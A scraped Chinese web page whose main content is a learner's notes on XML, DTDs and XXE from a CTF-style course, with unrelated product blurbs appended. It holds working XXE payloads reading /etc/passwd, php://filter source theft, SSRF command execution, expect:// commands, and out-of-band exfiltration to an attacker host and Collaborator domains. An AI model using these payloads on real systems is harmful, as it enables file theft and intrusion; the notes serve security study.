中土建设集团有限公司网站为什么百度搜不到我的网站

张小明 2026/1/9 21:46:31
中土建设集团有限公司网站,为什么百度搜不到我的网站,中文网站建设中模板下载,南京市公共工程建设 中心网站XML xml是一种标记语言 (标记语言可以理解为给数据贴标签#xff0c;做分类的语言#xff0c;就像是姓名数据我们可以贴上名字的标签) XML 指可扩展标记语言#xff08;Extensible Markup Language)#xff0c;是一种与HTML类似的纯文本的标记语言#xff0c;设计宗旨是…XMLxml是一种标记语言(标记语言可以理解为给数据贴标签做分类的语言就像是姓名数据我们可以贴上名字的标签)XML 指可扩展标记语言Extensible Markup Language)是一种与HTML类似的纯文本的标记语言设计宗旨是为了传输数据而非显示数据。是W3C的推荐标准。XML会把数据结构化后传输给对方让对方在结构化的数据中读取而且标签没有被预定义需要自行来定义标签?xml version1.0 encodingutf-8 ?这行是必须要写的且必须放在首行前面有注释都不行哦标签是成对存在的记得嵌套正确?xml version1.0 encodingutf-8 ? !--Users是一个根标签必须只能有一个而Users里面的子属性可以有多个-- !--根标签名字随意取中文也是可以的-- Users user id1 name张三/name age18/age address广州/address /user userAttribute都是爱学习的人/userAttribute user id2 name李四/name age25/age address哈尔滨/address /user !--以下是带有大于号小于号等特殊字符的写法-- special ![CDATA[ 5 2 3 5 ]] /special !--特殊字符用法二-- special 5 gt; 2 amp;amp; 3 lt; 5 /special /Users实体符号lt;gt;amp;quot;apos;XML和HTML的区别XML的功能是结构化的描述存储和传输数据而且XML的标签名是随便命名的它要用于传输和存储数据所以像用户提交用户名密码的验证时可以使用XML格式来提交的xml的焦点是数据的内容HTML是可以用于开发的功能是定义网页的结构加上承载要展示的数据而且HTML的标签是由特定的意义的和特定的功能的HTML是用来显示数据的HTML的焦点在于数据的外观总的来说XML 管 “数据是啥”HTML 管 “数据咋显示”XML 的标签自己定HTML 的标签有固定用法XML 语法不能错HTML 写错也能凑合用。写XML的注意事项在 XML 中省略关闭标签是非法的。所有元素都必须有关闭标签XML中的标签都是成对出现的XML必须正确地嵌套XML标签对大小写敏感XML文档必须要有根元素根元素可以根据题目要求来但是跟下面的子节点是要根据要求来命名头部声明实用声明在 XML 中有5 个预定义的实体引用例如?xml version1.0 encodingUTF-8? root man1 lt; 2/man /root使用php解析xml读取XML文档的两种方法1,使用simplexml_load_file()读取XML文档2使用DOMDocument读取XML文档php页面调用xml?php $xmlsimplexml_load_file(student.xml); print_r($xml);?xml version1.0 encodingUTF-8? root man name程咬金/name age299/age /man man name赵云/name age2021/age /man /root访问index.php就会显示出来student.php中的内容SimpleXMLElement Object ( [man] Array ( [0] SimpleXMLElement Object ( [name] 程咬金 [age] 299 ) [1] SimpleXMLElement Object ( [name] 赵云 [age] 2021 ) ) )如果只是单单想调用程咬金这个名字就可以像反序列化一样?php $xmlsimplexml_load_file(student.xml); echo $xml-man[0]-name;使用DOMDocument读取XML文档DOMDocument()是一个类使用前需要将其实例化成为对象实例化对象后调用对象里的成员方法?php $xmlinclude(student.xml); $docnew DOMDocument(); $doc-loadXML($xml); //使用loadXML()成员方法来调用文件 printf($doc-saveXML()); //调用saveXML()成员方法来读取xml文件的内容 ?还可以这样读取?php $docnew DOMDocument(); $doc-load(student.xml); printf($doc-saveXML()); ?混合调用这个方法和上面使用$xmlsimplexml_load_file(student.xml);导入的内容的相同的然后下面就可以使用echo $xml-man[0]-name;来得到想要的名字了DTD声明介绍Document Type DefinitionXML 是一种可以自己发明标签的格式比如你可以自己写书名、作者这种标签 但而DTD 就是用来规定 “这些自定义标签能不能用、怎么用” 的规则书。 比如你定义了书名DTD 会明确这个标签里能不能放文字能不能嵌套其他标签直接写在 XML 文件里把规则和 XML 内容写在一起 单独存成一个文件让 XML 去引用它比如写个book.dtd文件存规则然后在 XML 里写一句 “我要遵守这个文件的规则”。 简单说DTD 就是 XML 的 “语法检查器 结构说明书”防止你乱写标签把 XML 搞乱内部的DTD声明没有DTD时xml文件可以随意定义添加标签加上DTD就可以来约束xml的内容所以DOCTYPE用来约束XML规则声明一般写在第二行 格式!DOCTYPE 根元素[元素声明]!DOCTYPE root [ 跟标签也就是根节点 !ELEMENT root (man) 定义根节点下面有一个man的枝节点 !ELEMENT man (name,age,high) 定义man这个枝节点下面有nameagehigh这三个叶节点 !ELEMENT name(#PCDATA)] 而且给“叶”节点定义PCDATA意思是name的内容自能是文本文档的格式但是这个并不是强制性的如果你不按照要求来写还是可以显示内容但是会对错的部分进行高亮显示定义实体可以理解为定义一个变量外部引入DTD文件这里就有一个漏洞就是如果引用的不是1.dtd文件而是其他文件那就会读取到其他文件中的内容可以使用xml的内部实体或外部实体给读取的内容展示出来XML几种实体介绍实体就是 XML 里的 “快捷引用”—— 你可以把一段重复的内容、或者一个外部文件先给它起个 “代号”实体名之后写 XML 的时候直接用这个代号代替内容就行解析 XML 的程序会自动把代号替换成对应的内容。 举两个例子更清楚 替代文本的实体比如重复写 “《XML 入门》” 太麻烦 先定义实体!ENTITY book 《XML入门》 用的时候写书名book;/书名 解析后会变成书名《XML入门》/书名 引用外部文件的实体比如要插入一个说明文档 先定义实体!ENTITY note SYSTEM 说明.txt 用的时候写备注note;/备注 解析后会自动把 “说明.txt” 里的内容填到备注里。字符实体命名实体可以按照变量来理解在!ENTITY writer benben 中writer可以理解为变量的名字benben是变量的内容输出的是变量的内容迭代调用这样和authorwriter;copyright;/author是一样的意思外部实体参数实体我们可以写一个% area来代替namestreetpincodecity那么下面的namestreetpincodecity都可以写成% area 如上图XXE漏洞成因介绍XXEXML 外部实体注入是 XML 使用过程中出现的风险问题—— 简单说就是坏人利用 “外部实体” 的功能偷偷让 XML 程序去读取服务器上的文件、甚至执行恶意操作。SYSTEM引用服务器自己电脑里的文件比如本地的C:\密码.txt PUBLIC引用其他服务器上的公共文件比如某网站的http://黑客网站/恶意代码.dtd。DTD 是定义 XML 结构的规则书而外部实体是写在 DTD 里的—— 如果程序没限制 DTD 里的外部实体坏人就能在 DTD 里写恶意的外部实体让 XML 解析器去读敏感文件比如服务器的密码、配置这就是 XXE 漏洞 坏人在 DTD 里写!ENTITY bad SYSTEM file:///C:/服务器密码.txt 让 XML 解析这个 DTD用bad;引用这个实体 程序就会把 “服务器密码.txt” 的内容读出来坏人就能拿到敏感信息例题?php error_reporting(0); libxml_disable_entity_loader(false); $xml file_get_contents(php://input); //读取 HTTP 请求体中的原始数据并赋值给变量$xml if(isset($xml)){ $dom new DOMDocument(); //实例化 DOMDocument 类创建 XML 解析对象并使用DOMDocument()读取xml结构 $dom-loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); //使用loadXML来加载xml中的内容 $creds simplexml_import_dom($dom); //使用simplexml_import_dom()来调用$dom $benben $creds-admin; //将$creds中的admin节点的值赋值给$benben并输出 echo $benben; } highlight_file(__FILE__); ? php://input 这个 PHP 内置流的读取规则直接决定了 “必须用 POST或 PUT/PATCH 等来提交”根节点root/root可以随意起名字但是题目要求的必须是admin/admin中的内容所以这个名字不能随意改变必须是admin增加DTD声明引起漏洞调用外部实体来读取内部文件内容!DOCTYPE admin [!ENTITY ben SYSTEM file:///etc/passwd]rootadminben;/admin/root不同程序支持的协议不同php支持的协议多一些但是需要一定的拓展支持xxe漏洞的利用XXE使用外部实体来读取文件!DOCTYPE root [ !ENTITY ben SYSTEM file:///etc/passwd ]如何判断是否存在XXE漏洞测试是否存在XXE漏洞参数实体及http协议XXE利用有过滤的XXE正常输入用户名密码使用外部实体来读取文件但是发现是有过滤的发现是过滤了file://所以可以尝试命名实体命名实体只能用在DTD文档内这不能使用file://可以使用命名实体将file://放到1.dtd中然后到web中下载1.dtdhttp://x.x.x.x/1.dtd 然后读取文件中的内容放到% dazhuang中然后就可以使用file:///etc/passwd 了使用kali搭建HTTP服务!ENTITY ben SYSTEM file:///etc/passwd!DOCTYPE user [ !ENTITY % dazhuang SYSTEM http://kaliip/1.dtd% dazhuang;]userusernameben;/usernamepasswordadmin/password/user利用XXE进行SSRF利用攻击方式攻击者构造一个特殊的 XML payload让 “主机 A”通过 XXE 的 DTD向 “主机 B” 发起 HTTP 请求从而绕过 “攻击者无法直接访问主机 B” 的限制。攻击者在外网是无法访问主机B来利用主机B的命令执行漏洞但是攻击者可以访问主机A然后攻击者就利用A的XXE漏洞为跳板该漏洞天然具备SSRF功能来触发A的SSRF行为让主机A来访问主机B然后利用主机B的命令执行漏洞获得flag打开靶场输入用户名密码然后抓包抓包后写入!DOCTYPE root [ !ENTITY ben SYSTEM http://10.1.2.3 ]而http://10.1.2.3是主机B的IP执行命令!DOCTYPE root [ !ENTITY ben SYSTEM http://10.1.2.3/?cmdls ]!DOCTYPE root [ !ENTITY ben SYSTEM http://10.1.2.3/?cmdcatflag ]post提交一般会进行url编码和解码cat flag中间有空格一般会读取不出来内容所以空格要使用或%20来代替XXE利用php伪协议读取文件php伪协议相比较file伪协议php伪协议可以对读取出来的文件内容进行编码例题读取主机B的源代码打开靶机输入用户名密码抓包输入!DOCTYPE root [!ENTITY ben SYSTEMphp://filter/readconvert.base64-encode/resource/etc/passwd]来读取本地的/etc/passwd将内容进行base64加密输出然后进行解码使用SSRF读取主机B上的文件的源代码!DOCTYPE root [ !ENTITY ben SYSTEM php://filter/readconvert.base64-encode/resourcehttp://10.1.2.3/?cmdcatindex.php]不用base64编码直接用file协议读取的话index.php会直接被解析掉看不到源代码总结php伪协议加上XXE最主要的作用就是读取源代码利用expect扩展进行命令执行expect:// 是 PHP 中高危的伪协议核心能力是交互式命令执行 但依赖expect扩展实际环境中不常见。 在 CTF 或渗透测试中若遇到目标服务器启用了该扩展可直接利用它执行任意命令、读取敏感文件甚至结合 XXE/SSRF 突破网络限制攻击内网。使用条件安装了expect扩展 PHP 默认不包含expect扩展需要手动编译安装所以实际环境中较少见但 CTF / 靶场中常作为考点。 allow_url_fopen开启 PHP 配置中allow_url_fopen On默认开启允许通过伪协议访问资源。例题打开靶机输入用户名密码然后进行抓包添加!DOCTYPE root [!ENTITY xxe SYSTEM expect://id]为XML外部实体提供伪URI的引用PHP将执行id并返回外部实体替换命令的输出让目标服务器的 PHP通过 XML 解析这个指令自动执行系统命令id查看当前用户身份并把执行结果填到 XML 里返回也可以进行命令执行输入!DOCTYPE root [!ENTITY xxe SYSTEM expect://ls]这七个字符会被类似为过滤了这七个字符无回显XXE带外数据处理无回显XXE的步骤1验证XXE漏洞是否存在2带外数据就是将读取到的文件显示出来利用DNSlog来验证是否存在XXE漏洞输入!DOCTYPE root 「!ENTITY % file SYSTEMhttp://gj3m16jagyoa1hn7hgo699j06rch06.burpcollaborator.net%file;]定义参数实体file,并直接调用%file;执行http://协议访问网站是通过http://这个伪协议来访问域名从而让DNS来解析这个域名这样就会有DNS的解析记录这样就能验证是否存在XXE漏洞有记录就是有XXE漏洞没有记录就是没有xxe漏洞DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。还可以使用Burp Suite中的Collaborator来进行查看DNSLog信息还能接收HTTP请求数据外带内容输入!DOCTYPE root [!ENTITY ben SYSTEM file://etc/passwd]但是没有回显到Collaborator中生成payload复制到Repeater中使用参数实体ben,并直接调用%file;执行http://协议而伪协议的内容为Collaborator中生成的payload这样就能通过Collaborator中的立即轮询来查询是否进行了DNS解析进行解析就代表有XXE漏洞2也可以在kali开启http服务监听端口抓取HTTP请求GET链接内容,使用nc -lvp 7777在Repeater中将!DOCTYPE root [!ENTITY % ben SYSTEM http://rtovfmclgm5oj0l8btnirb2u7ldd16pv.oastify.com%ben;]改为!DOCTYPE root [!ENTITY % ben SYSTEM http://kali的IP地址7777%ben;]内部DTD禁止参数实体内再次调用参数实体在% send参数实体中调用% file参数实体是不可以的外部DTD可以重复调用参数实体允许参数实体调用其他参数实体在kali中存入1.dtd的文档然后使用参数实体% dazhuang!ENTITY % dazhuang SSTEM http://kali的ip/1.dtd%dazhuang; 来下载kali中的1.dtd文档从而解析1.dtd中的内容最终实现file协议的调用带外数据!ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourcefile:///etc/passwd!ENTITY % int !ENTITY #37; send SYSTEM http://kali的ip:7777/?p%file;用php伪协议把file:///etc/passwd的结果进行base64编码然后赋值给参数实体file用http伪协议把%file;的值通过get提交给参数实体send参数实体int包含参数实体send攻击者在自己的7777端口用nc -lvp 7777监听收到请求从 URL 参数中提取p的值解码后拿到/etc/passwd的内容。#37;是%为什么要使用#37;来代替%这是因为内部DTD禁止参数实体内再次调用参数实体使用#37;就不会认为是参数实体内再次调用参数实体上面是1.dtd的内容在bp中写入payload!DOCTYPE conver [!ENTITY % remote SYSTEM http://192.168.3.110/1.dtd%remote; %int;%send;]先触发参数实体remote来从kali上下载1.dtd然后触发int来调用出来!ENTITY #37; send SYSTEM http://kali的ip:7777/?p%file;这段话然后触发参数实体send来调用传入到kali的参数实体file的内容触发参数实体remote后是这样的触发int触发参数实体send在%send;内部调用%file;(包含file:///etc/passwd的信息并通过GET提交给192.168.3.110:7777如果靶机可以进行DNS域名解析就可以将1.dtd的内容改为!ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourcefile:///etc/passwd!ENTITY % int !ENTITY #37; send SYSTEM http://ozrsljiimjblpxr5hqtfx88rdija74vt.oastify.com/?p%file;http://ozrsljiimjblpxr5hqtfx88rdija74vt.oastify.com/中的ozrsljiimjblpxr5hqtfx88rdija74vt.oastify.com是从bp中的Collaborator中获取的这样就不需要进行端口监听就可以直接在bp的然后查看Collaborator中的记录查看http就会获得/etc/passwd/的内容xinclude“xinclude” 是对 “XML Include” 的简称 XInclude 是 XML 标准的一部分用于在一个 XML 文档中包含另一个 XML 文档的内容。它类似于编程中的引入或导入功能有助于更好地组织和重用 XML 内容。基本语法首先需要声明 XInclude 命名空间然后使用 xi:include 元素引用外部文件!-- 声明命名空间 -- root xmlns:xihttp://www.w3.org/2001/XInclude !-- 包含外部 XML 文件 -- xi:include hrefheader.xml/ !-- 文档主体内容 -- content这是主文档内容/content !-- 包含另一个文件 -- xi:include hreffooter.xml/ /rootxmlns:xihttp://www.w3.org/2001/XInclude这段是必要写的内容它和 PHP 的include、Python/Java 的import本质是同一类技术 ——“文件 / 模块包含”xinclude是 XML 的标准机制允许在一个 XML 文档中 “包含另一个 XML 文件的内容”文件包含可以使代码更整洁我们可以将定义的功能函数放在function.php中再在需要使用功能函数的文件中使用include包含function.php这样就避免了重复几余的函数定义同样可以增加代码的可读性?phpinclude(/file.php’)把文件路径下的文件读取出来并引用所定义的函数或者变量调用templates/目录下的文件footer.xml可以是代码更加整洁增加代码的可读性与外部实体的区别外部实体无法成为一个成熟的独立的 XML 文档,因为它既不允许独立的 XML 声明也不允许 Doctype 声明。简单来说就是起外号给一段内容起一个外号当叫这个外号时就知道是在调用外号对应的内容xinclude可以调用一个独立完整的XML内容,与PHP文件包含的区别php文件包含include直接调用函数?php include(/file.php)xinclude使用时前面需要做一个前缀声明root xmIns:xihttp://www.w3.org/2001/XInclude可能存在的漏洞路径遍历攻击恶意构造路径访问敏感文件服务器端请求伪造(SSRF)通过URL访问内网资源拒绝服务(DoS)超大文件或嵌套包含耗尽资源恶意内容注入包含被篡改的文件例题读取出来/etc/passwd/文件内容使用SVG进行XXE漏洞利用SVG文件SVG 是 “Scalable Vector Graphics可缩放矢量图形” 的缩写是基于 XML 标记语言的二维矢量图形格式同时也是一种 “图片格式”—— 但和 JPG、PNG 等 “位图格式” 有本质区别。SVG 的内容是纯文本的 XML 代码而非像 JPG 那样的二进制数据。例如一个简单的 SVG 图形代码描述红色圆形svg width100 height100 xmlnshttp://www.w3.org/2000/svg circle cx50 cy50 r40 fillred / /svg这种 “文本化” 是 SVG 所有特性的基础。作为一个基于文本的开放网络标准SVG 能够优雅而简洁地渲染不同大小的图形并和 CSS、DOM、JavaScript 和 SMIL 等其他网络标准无缝衔接。本质上SVG 相对于图像就好比 HTML相对于文本。SVG 图像及其相关行为被定义于 XML 文本文件之中这意味着可以对它们进行搜索、索引、编写脚本以及压缩。此外这也意味着可以使用任何文本编辑器和绘图软件来创建和编辑它们。通过SVG文件进行XXE漏洞利用从而读取对方文件。例题SVG文件?xml version1.0 standaloneyes? !DOCTYPE svg [ !ENTITY xxe SYSTEM file:flag.txt //读取了flag.txt文件 ] svg width500px height100px xmlnshttp://www.w3.org/2000/svg xmlns:xlinkhttp://www.w3.org/1999/xlink version1.1 text font-familyVerdana font-size16 x10 y40xxe;/text //然后使用图片的形式展示出来 /svg上传SVG文件,会获得flag以上是我的看橙子科技的xxe课笔记学习xxe一定要想学习xml了解一些基本的xml的知识否则是会听不懂后面的课不理解payload的含义xml就像是xxe的地基一定要将地基打牢在学习xxe其实我感觉在学习xxe前可以先学习php反序列化或者了解一下也会对学习xxe有一个更好的理解。以上仅仅是个人的学习感受
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

本地网站模板修改网站模板 家

VoxCPM语音克隆终极指南:5分钟打造你的专属语音助手 【免费下载链接】VoxCPM-0.5B 项目地址: https://ai.gitcode.com/OpenBMB/VoxCPM-0.5B 还在为配音烦恼吗?VoxCPM-0.5B开源TTS模型来了!只需3秒参考音频,就能克隆任何人…

张小明 2025/12/23 3:43:55 网站建设

帮做ppt网站网页设计与制作section什么意思

🔍 你是否曾在家庭聚会时遭遇IPTV频道集体"中断"?或者在酒店前台面对客人投诉"电视没信号"却束手无策?IPTV播放列表检测正成为数字娱乐时代的关键技能,而iptv-checker工具正是解决这些痛点的利器。本文将带你…

张小明 2025/12/30 12:32:18 网站建设

建设一个旅游网站wordpress id从1开始

Vue-Office终极指南:3分钟实现Web端Office文件预览 【免费下载链接】vue-office 项目地址: https://gitcode.com/gh_mirrors/vu/vue-office 想要在Vue项目中快速集成Word、Excel和PDF文件预览功能吗?Vue-Office组件库为您提供一站式解决方案&…

张小明 2025/12/22 19:44:47 网站建设

购物网站技术实施方案做网站得花多钱

网络安全与用户管理全解析 一、用户配置文件与登录脚本 在Windows系统中,用户配置文件是一项非常实用的功能。它能记录单个用户对Windows配置的偏好设置。对于非联网计算机而言,用户配置文件使得两个或更多用户可以使用同一台计算机,并且各自拥有独立的桌面设置,像壁纸、…

张小明 2026/1/8 5:33:38 网站建设

龙华做网站联系电话怎么建立一个网站开展业务

目录 这里写目录标题目录项目介绍项目展示详细视频演示技术栈文章下方名片联系我即可~解决的思路开发技术介绍性能/安全/负载方面python语言Django框架介绍技术路线关键代码详细视频演示收藏关注不迷路!!需要的小伙伴可以发链接或者截图给我 项目介绍 …

张小明 2025/12/22 14:52:27 网站建设